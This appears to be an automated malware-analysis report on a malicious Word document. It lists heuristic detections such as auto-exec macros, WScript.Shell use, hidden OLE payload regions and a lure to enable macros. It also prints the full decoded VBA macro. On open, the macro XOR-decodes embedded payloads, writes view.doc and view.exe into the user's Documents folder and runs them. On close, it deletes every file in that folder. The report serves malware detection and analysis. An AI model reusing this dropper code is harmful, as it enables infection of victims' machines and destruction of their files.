MALICIOUS
338
Risk Score
Heuristics 12
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set dfgetyuuyilhjklhjli = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set FSO = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 805,095 bytes but its declared streams total only 67,185 bytes — 737,910 bytes (92%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADOLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5430 bytes |
SHA-256: 3cdbbc4b1de0241fab1df63c381c13ffb98a63d3fccc83eb379b8169d60c7677 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj As String
Public atbtyjkyulrjfgjhff As String
Function wesdfwfedfwfajghjghj(fhkfhfgdfsxzgzag() As Byte, rtuytrufgjkhjkghlggkgk As Long) As Byte
For I = 0 To rtuytrufgjkhjkghlggkgk - 1
wesdfwfedfwfajghjghj = wesdfwfedfwfajghjghj Xor fhkfhfgdfsxzgzag(I)
Next I
End Function
Function sdfghgyukgkgjkghkgh(fhkfhfgdfsxzgzag() As Byte, rtuytrufgjkhjkghlggkgk As Long) As Boolean
Dim VarByte As Byte
VarByte = 75
For I = 0 To rtuytrufgjkhjkghlggkgk - 1
fhkfhfgdfsxzgzag(I) = fhkfhfgdfsxzgzag(I) Xor VarByte
VarByte = (VarByte Xor ((200 + I) Mod 256))
VarByte = (VarByte Xor (I Mod 256))
Next I
sdfghgyukgkgjkghkgh = True
End Function
Sub AutoClose()
On Error Resume Next
Kill fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.DeleteFile atbtyjkyulrjfgjhff & "\*.*", True
Set FSO = Nothing
End Sub
Sub AutoOpen()
On Error GoTo ityikhjkhkjldrtrrrdgdgdfg
Set sfhdfjhmghdghnhcncncgmf = CreateObject("WScript.Network")
atbtyjkyulrjfgjhff = "C:\Users\" & sfhdfjhmghdghnhcncncgmf.UserName & "\Documents"
Set dfgetyuuyilhjklhjli = CreateObject("WScript.Shell")
Dim weqweatrtyrtyt
Dim ilqiugsafdfasfalalfal As Long
Dim qwdoighaisafasfa As Long
Dim erfgdfgdfgrtgrtrhtrt As Long
Dim wioperupoagsadfgsdgs As Byte
Dim qweposdfasfagsg As Long
Dim asdfwafgsdfgrhtjhsss As Byte
ilqiugsafdfasfalalfal = FileLen(ActiveDocument.FullName)
weqweatrtyrtyt = FreeFile
Open (ActiveDocument.FullName) For Binary As #weqweatrtyrtyt
Get #weqweatrtyrtyt, (ilqiugsafdfasfalalfal - 3), qwdoighaisafasfa
If qwdoighaisafasfa < 8 Then
GoTo ityikhjkhkjldrtrrrdgdgdfg
End If
If (qwdoighaisafasfa + 4) > ilqiugsafdfasfalalfal Then
GoTo ityikhjkhkjldrtrrrdgdgdfg
End If
Dim sadgwsgfhnfghggggg As Long
sadgwsgfhnfghggggg = ilqiugsafdfasfalalfal - qwdoighaisafasfa + 1
Get #weqweatrtyrtyt, sadgwsgfhnfghggggg, erfgdfgdfgrtgrtrhtrt
sadgwsgfhnfghggggg = sadgwsgfhnfghggggg + 4
Dim tyiytuihrertszgzggfffh() As Byte
ReDim tyiytuihrertszgzggfffh(erfgdfgdfgrtgrtrhtrt - 1)
Get #weqweatrtyrtyt, sadgwsgfhnfghggggg, tyiytuihrertszgzggfffh
sadgwsgfhnfghggggg = sadgwsgfhnfghggggg + erfgdfgdfgrtgrtrhtrt
Get #weqweatrtyrtyt, sadgwsgfhnfghggggg, wioperupoagsadfgsdgs
sadgwsgfhnfghggggg = sadgwsgfhnfghggggg + 1
If Not sdfghgyukgkgjkghkgh(tyiytuihrertszgzggfffh(), erfgdfgdfgrtgrtrhtrt) Then
GoTo ityikhjkhkjldrtrrrdgdgdfg
End If
Dim sdfasdfsasfsssfhdfnhnjj As Byte
sdfasdfsasfsssfhdfnhnjj = wesdfwfedfwfajghjghj(tyiytuihrertszgzggfffh(), erfgdfgdfgrtgrtrhtrt)
If wioperupoagsadfgsdgs <> sdfasdfsasfsssfhdfnhnjj Then
GoTo ityikhjkhkjldrtrrrdgdgdfg
End If
Dim poiweasdgsdfgar
poiweasdgsdfgar = FreeFile
fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj = atbtyjkyulrjfgjhff & "\" & "view.doc"
Open (fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj) For Binary As poiweasdgsdfgar
Put poiweasdgsdfgar, 1, tyiytuihrertszgzggfffh
Close poiweasdgsdfgar
Erase tyiytuihrertszgzggfffh
dfgetyuuyilhjklhjli.Run fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj
Get #weqweatrtyrtyt, sadgwsgfhnfghggggg, qweposdfasfagsg
sadgwsgfhnfghggggg = sadgwsgfhnfghggggg + 4
Dim sdfsdfwefergjyuyuktysassdhd() As Byte
ReDim sdfsdfwefergjyuyuktysassdhd(qweposdfasfagsg - 1)
Get #weqweatrtyrtyt, sadgwsgfhnfghggggg, sdfsdfwefergjyuyuktysassdhd
sadgwsgfhnfghggggg = sadgwsgfhnfghggggg + qweposdfasfagsg
Get #weqweatrtyrtyt, sadgwsgfhnfghggggg, asdfwafgsdfgrhtjhsss
sadgwsgfhnfghggggg = sadgwsgfhnfghggggg + 1
If Not sdfghgyukgkgjkghkgh(sdfsdfwefergjyuyuktysassdhd(), qweposdfasfagsg) Then
GoTo ityikhjkhkjldrtrrrdgdgdfg
End If
sdfasdfsasfsssfhdfnhnjj = wesdfwfedfwfajghjghj(sdfsdfwefergjyuyuktysassdhd(), qweposdfasfagsg)
If asdfwafgsdfgrhtjhsss <> sdfasdfsasfsssfhdfnhnjj Then
GoTo ityikhjkhkjldrtrrrdgdgdfg
End If
Dim rtyrrrtyhdfdfhdfhddddhdfh
rtyrrrtyhdfdfhdfhddddhdfh = FreeFile
fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj = atbtyjkyulrjfgjhff & "\" & "view.exe"
Open (fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj) For Binary As rtyrrrtyhdfdfhdfhddddhdfh
Put rtyrrrtyhdfdfhdfhddddhdfh, 1, sdfsdfwefergjyuyuktysassdhd
Close rtyrrrtyhdfdfhdfhddddhdfh
Erase sdfsdfwefergjyuyuktysassdhd
dfgetyuuyilhjklhjli.Run fjhjfghjftjftjfgjhfgjfgjfgjfgjfgj
Close #weqweatrtyrtyt
Close poiweasdgsdfgar
Close rtyrrrtyhdfdfhdfhddddhdfh
Exit Sub
ityikhjkhkjldrtrrrdgdgdfg:
Close #weqweatrtyrtyt
Close poiweasdgsdfgar
Close rtyrrrtyhdfdfhdfhddddhdfh
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.